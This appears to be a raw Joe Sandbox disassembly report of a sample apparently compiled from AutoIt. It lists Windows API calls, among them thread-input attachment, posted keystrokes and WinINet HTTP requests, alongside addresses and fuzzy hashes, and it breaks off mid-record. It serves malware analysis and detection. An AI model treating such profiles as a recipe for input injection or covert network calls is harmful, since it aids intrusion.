                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00663AC7
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00663AEA
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00663B62
                                                                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00663BAC
                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00663BC7
                                                                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00663BE2
                                                                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00663BF6
                                                                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00663C13
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$LongWindow
                                                                                • String ID:
                                                                                • API String ID: 312131281-0
                                                                                • Opcode ID: e1719e023fbbeeb3ccc7b95db46f563078797e4e1c2049ca8d2dcdd5d4e538ba
                                                                                • Instruction ID: a532e3605bb6e83a3d939f16d3fbcb3b5c3bf4c5b7bd93d4ad5cd77964b9b679
                                                                                • Opcode Fuzzy Hash: e1719e023fbbeeb3ccc7b95db46f563078797e4e1c2049ca8d2dcdd5d4e538ba
                                                                                • Instruction Fuzzy Hash: 99617975900218AFDB10DFA8CC81EEE77B9EB4A700F10019AFA15AB3A1C774AE41DF50
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0063B151
                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0063A1E1,?,00000001), ref: 0063B165
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0063B16C
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0063A1E1,?,00000001), ref: 0063B17B
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0063B18D
                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0063A1E1,?,00000001), ref: 0063B1A6
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0063A1E1,?,00000001), ref: 0063B1B8
                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0063A1E1,?,00000001), ref: 0063B1FD
                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0063A1E1,?,00000001), ref: 0063B212
                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0063A1E1,?,00000001), ref: 0063B21D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                • String ID:
                                                                                • API String ID: 2156557900-0
                                                                                • Opcode ID: e803eb4aab7e4407211437e906204a3121f10bd87a0b8e68fdf8ba2306de1867
                                                                                • Instruction ID: 1f8677ab8368066cf292dcebb59de1a1ce4ffea70337c75d784e1184b16d6956
                                                                                • Opcode Fuzzy Hash: e803eb4aab7e4407211437e906204a3121f10bd87a0b8e68fdf8ba2306de1867
                                                                                • Instruction Fuzzy Hash: C9319C71500614BFDB10AF24DC49BBEBBABBB52321F146115FA02D6390D7B5AA408FA4
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00602C94
                                                                                  • Part of subcall function 006029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000), ref: 006029DE
                                                                                  • Part of subcall function 006029C8: GetLastError.KERNEL32(00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000,00000000), ref: 006029F0
                                                                                • _free.LIBCMT ref: 00602CA0
                                                                                • _free.LIBCMT ref: 00602CAB
                                                                                • _free.LIBCMT ref: 00602CB6
                                                                                • _free.LIBCMT ref: 00602CC1
                                                                                • _free.LIBCMT ref: 00602CCC
                                                                                • _free.LIBCMT ref: 00602CD7
                                                                                • _free.LIBCMT ref: 00602CE2
                                                                                • _free.LIBCMT ref: 00602CED
                                                                                • _free.LIBCMT ref: 00602CFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 85fef346c535f288309e4060a1ea722b2f831f2609e3f17c6314a2b332e34836
                                                                                • Instruction ID: 68fccbbe7df5b585ea8181556d0a592cc3da6132ceeb441d13e58c3a6764b0a7
                                                                                • Opcode Fuzzy Hash: 85fef346c535f288309e4060a1ea722b2f831f2609e3f17c6314a2b332e34836
                                                                                • Instruction Fuzzy Hash: 87112B36140009BFCB4AEF55D856CDE3BAAFF05740F5048A8F9485F272D631EE509B94
                                                                                APIs
                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 005D1459
                                                                                • OleUninitialize.OLE32(?,00000000), ref: 005D14F8
                                                                                • UnregisterHotKey.USER32(?), ref: 005D16DD
                                                                                • DestroyWindow.USER32(?), ref: 006124B9
                                                                                • FreeLibrary.KERNEL32(?), ref: 0061251E
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0061254B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                • String ID: close all
                                                                                • API String ID: 469580280-3243417748
                                                                                • Opcode ID: 0bb8435564c078151af4c306728c68469bd2681bff2332462cebc45a163caf98
                                                                                • Instruction ID: 5895fe6c6cfae3f25d7ebed209473f0b1c5ddb1aeb7784882b9cba4c1cbc290c
                                                                                • Opcode Fuzzy Hash: 0bb8435564c078151af4c306728c68469bd2681bff2332462cebc45a163caf98
                                                                                • Instruction Fuzzy Hash: 71D18E307016139FCB29EF19C4A9AA9FBA6BF45710F14419EE44AAB351CB30ED62CF54
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 005D5C7A
                                                                                  • Part of subcall function 005D5D0A: GetClientRect.USER32(?,?), ref: 005D5D30
                                                                                  • Part of subcall function 005D5D0A: GetWindowRect.USER32(?,?), ref: 005D5D71
                                                                                  • Part of subcall function 005D5D0A: ScreenToClient.USER32(?,?), ref: 005D5D99
                                                                                • GetDC.USER32 ref: 006146F5
                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00614708
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00614716
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0061472B
                                                                                • ReleaseDC.USER32(?,00000000), ref: 00614733
                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006147C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                • String ID: U
                                                                                • API String ID: 4009187628-3372436214
                                                                                • Opcode ID: 3c7e5b60904d353303571b403a8732dfc511080f96a51a8c158ebd71c51899ee
                                                                                • Instruction ID: ddfc960d4ed7141d0b819b8bc971a4565d986311ee431bdf3f5564557c40612b
                                                                                • Opcode Fuzzy Hash: 3c7e5b60904d353303571b403a8732dfc511080f96a51a8c158ebd71c51899ee
                                                                                • Instruction Fuzzy Hash: F271EE30500205DFCF218F68C984AFA3BB7FF4A325F18426AE9555B2A6DB319C81DF60
                                                                                APIs
                                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 006435E4
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • LoadStringW.USER32(006A2390,?,00000FFF,?), ref: 0064360A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString$_wcslen
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 4099089115-2391861430
                                                                                • Opcode ID: 2e066acf4d152c866cdb5468777797194f1dea6eb602119ededdd38bcf3b6311
                                                                                • Instruction ID: 9b88dbae819ee5f896fbb66799d8a535925798eace97b0c9a9a0d9ad2e86ac94
                                                                                • Opcode Fuzzy Hash: 2e066acf4d152c866cdb5468777797194f1dea6eb602119ededdd38bcf3b6311
                                                                                • Instruction Fuzzy Hash: D151A37180021ABBDF24EBA4DC46EEEBB7ABF45300F144126F105722A1DB301B95DFA5
                                                                                APIs
                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0064C272
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0064C29A
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0064C2CA
                                                                                • GetLastError.KERNEL32 ref: 0064C322
                                                                                • SetEvent.KERNEL32(?), ref: 0064C336
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0064C341
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                • String ID:
                                                                                • API String ID: 3113390036-3916222277
                                                                                • Opcode ID: d162ce8ba685d472b33129d302cc15aece2cd5eddc487a27af680bf56fa8bde2
                                                                                • Instruction ID: 863ee70b6bee281cc6e6608e8ffd2bb2dee60bbb668c66138a6019a83629f9c4
                                                                                • Opcode Fuzzy Hash: d162ce8ba685d472b33129d302cc15aece2cd5eddc487a27af680bf56fa8bde2
                                                                                • Instruction Fuzzy Hash: BD31B1B1601604AFD7629F648C88ABB7BFEEF49760F00851DF48692300DB70DD059B60
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00613AAF,?,?,Bad directive syntax error,0066CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 006398BC
                                                                                • LoadStringW.USER32(00000000,?,00613AAF,?), ref: 006398C3
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00639987
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadMessageModuleString_wcslen
                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                • API String ID: 858772685-4153970271
                                                                                • Opcode ID: 106a55485deecf41b0fc9dd0e6a4cd7bf57521cf9bc1cf6ec29091dbb170f09a
                                                                                • Instruction ID: 608ba5ac0e666e773fe58f734e494c7cb84010d1214de0c129a3d63e26990899
                                                                                • Opcode Fuzzy Hash: 106a55485deecf41b0fc9dd0e6a4cd7bf57521cf9bc1cf6ec29091dbb170f09a
                                                                                • Instruction Fuzzy Hash: B721943190021EABDF25AF94CC0AEEE7B7AFF18700F04442BF515661A1DB719A28DF61
                                                                                APIs
                                                                                • GetParent.USER32 ref: 006320AB
                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 006320C0
                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0063214D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameParentSend
                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                • API String ID: 1290815626-3381328864
                                                                                • Opcode ID: af016500c36db37f76333a16bf42a5a47c1a9240dd3c61cdd677b3e35676d275
                                                                                • Instruction ID: 5c965206ccaa653841374b03f4ae521a611c325fd9ed8310fc175e229daac4dd
                                                                                • Opcode Fuzzy Hash: af016500c36db37f76333a16bf42a5a47c1a9240dd3c61cdd677b3e35676d275
                                                                                • Instruction Fuzzy Hash: DE115C7728870BBAFA012220DC2BCF7379FDB05324F200116F705E41D5FEB568425A58
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                • String ID:
                                                                                • API String ID: 1282221369-0
                                                                                • Opcode ID: f0e35a9732e993ef6100ac90dd81899d03a24fe7cf3aa6708b2ab7e9787b6e20
                                                                                • Instruction ID: e9ee42dc088ee0b199f43fd43d0941ff37eee69336ff849840c7916f3c45fbf9
                                                                                • Opcode Fuzzy Hash: f0e35a9732e993ef6100ac90dd81899d03a24fe7cf3aa6708b2ab7e9787b6e20
                                                                                • Instruction Fuzzy Hash: 426178B2984302AFDB2DBFB49895AAF7BA7AF01330F14426DF905A73C1D6319D018751
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00665186
                                                                                • ShowWindow.USER32(?,00000000), ref: 006651C7
                                                                                • ShowWindow.USER32(?,00000005,?,00000000), ref: 006651CD
                                                                                • SetFocus.USER32(?,?,00000005,?,00000000), ref: 006651D1
                                                                                  • Part of subcall function 00666FBA: DeleteObject.GDI32(00000000), ref: 00666FE6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0066520D
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0066521A
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0066524D
                                                                                • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00665287
                                                                                • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00665296
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                • String ID:
                                                                                • API String ID: 3210457359-0
                                                                                • Opcode ID: b7184de68763ee9f71cc4f73340afeeaa74d2f48b6fa0fdecac350874824bfb7
                                                                                • Instruction ID: 0f6292cd71d43d5d57f5cbdf776271935f4cce90c830645b9c95a2fb3a169222
                                                                                • Opcode Fuzzy Hash: b7184de68763ee9f71cc4f73340afeeaa74d2f48b6fa0fdecac350874824bfb7
                                                                                • Instruction Fuzzy Hash: F451D370A50A09BFEF209F25CC5BBD97B6BFB06320F144012F616963E0C3B5AA90DB51
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00626890
                                                                                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 006268A9
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006268B9
                                                                                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 006268D1
                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006268F2
                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,005E8874,00000000,00000000,00000000,000000FF,00000000), ref: 00626901
                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0062691E
                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,005E8874,00000000,00000000,00000000,000000FF,00000000), ref: 0062692D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                • String ID:
                                                                                • API String ID: 1268354404-0
                                                                                • Opcode ID: e76c088c221df7f154a164e809b622347962c04480cdfb56cce4300c6e9b0804
                                                                                • Instruction ID: b1534bdf575b333ed3ef6dbe8d43f5104f3f3c5d2dbef71a4c8b95d11cbf1c0c
                                                                                • Opcode Fuzzy Hash: e76c088c221df7f154a164e809b622347962c04480cdfb56cce4300c6e9b0804
                                                                                • Instruction Fuzzy Hash: 89519B70A00A09EFDB24DF25DC55BBA7BBAFB44360F104518F996972A0DBB0E990DF50
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0064C182
                                                                                • GetLastError.KERNEL32 ref: 0064C195
                                                                                • SetEvent.KERNEL32(?), ref: 0064C1A9
                                                                                  • Part of subcall function 0064C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0064C272
                                                                                  • Part of subcall function 0064C253: GetLastError.KERNEL32 ref: 0064C322
                                                                                  • Part of subcall function 0064C253: SetEvent.KERNEL32(?), ref: 0064C336
                                                                                  • Part of subcall function 0064C253: InternetCloseHandle.WININET(00000000), ref: 0064C341
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 337547030-0
                                                                                • Opcode ID: 97a99c1f1e2b933b6b4453723b468182dc5b91018e331e3253eb33441718b073
                                                                                • Instruction ID: 815e09d4c6fb642dc824b29216ce790dafca816c4c382452e62a6c3efc6473bc
                                                                                • Opcode Fuzzy Hash: 97a99c1f1e2b933b6b4453723b468182dc5b91018e331e3253eb33441718b073
                                                                                • Instruction Fuzzy Hash: 4C31AF71202A41AFDB619FB5DC04AB7BBFAFF18320B00442DF99683720D7B1E9149B60
                                                                                APIs
                                                                                  • Part of subcall function 00633A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00633A57
                                                                                  • Part of subcall function 00633A3D: GetCurrentThreadId.KERNEL32 ref: 00633A5E
                                                                                  • Part of subcall function 00633A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006325B3), ref: 00633A65
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006325BD
                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006325DB
                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 006325DF
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006325E9
                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00632601
                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00632605
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0063260F
                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00632623
                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00632627
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                • String ID:
                                                                                • API String ID: 2014098862-0
                                                                                • Opcode ID: c3e99a4757f0309f3e4b076d5f1779d2f041d1d984f573f563204ba82770d9bd
                                                                                • Instruction ID: 0904cc804aeaf34d170005ce9980b9601eca4e19e89337dbd1d469902f9139fd
                                                                                • Opcode Fuzzy Hash: c3e99a4757f0309f3e4b076d5f1779d2f041d1d984f573f563204ba82770d9bd
                                                                                • Instruction Fuzzy Hash: F801D430390620BBFB107768DC8AF697F5ADF4EB22F101005F358AE1E1C9E224449AAD
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00631449,?,?,00000000), ref: 0063180C
                                                                                • HeapAlloc.KERNEL32(00000000,?,00631449,?,?,00000000), ref: 00631813
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00631449,?,?,00000000), ref: 00631828
